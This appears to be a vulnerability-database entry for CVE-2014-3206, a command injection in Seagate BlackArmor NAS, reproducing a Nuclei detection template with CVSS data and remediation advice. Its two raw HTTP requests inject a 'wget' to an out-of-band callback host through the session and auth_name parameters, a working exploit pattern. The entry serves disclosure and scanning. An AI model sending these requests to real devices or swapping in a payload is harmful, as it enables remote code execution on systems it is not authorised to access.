CVE-2014-3206: Seagate BlackArmor NAS - Command Injection

日期: 2025-08-01 | 影响软件: Seagate BlackArmor NAS | POC: 已公开

漏洞描述

Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php.

PoC代码[已公开]

id: CVE-2014-3206

info:
  name: Seagate BlackArmor NAS - Command Injection
  author: gy741
  severity: critical
  description: Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands with the privileges of the affected device, potentially leading to unauthorized access, data loss, or further compromise of the network.
  remediation: |
    Apply the latest firmware update provided by Seagate to patch the command injection vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2014-3206
    - https://www.exploit-db.com/exploits/33159
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2014-3206
    cwe-id: CWE-20
    epss-score: 0.92827
    epss-percentile: 0.99754
    cpe: cpe:2.3:o:seagate:blackarmor_nas_220_firmware:-:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: seagate
    product: blackarmor_nas_220_firmware
  tags: cve2014,cve,seagate,rce,edb

http:
  - raw:
      - |
        GET /backupmgt/localJob.php?session=fail;wget+http://{{interactsh-url}}; HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
      - |
        GET /backupmgt/pre_connect_check.php?auth_name=fail;wget+http://{{interactsh-url}}; HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"
# digest: 490a00463044022017a7c1f54853274e262b0ac75ae6400db4bd2a3a92901a70d4f7b82899225b9302207863ef270f77e1b9265a64e4df02ed4dc7045a258cf9eb3d31bcb3c5f4a3a505:922c64590222798bb761d5b6d8e72950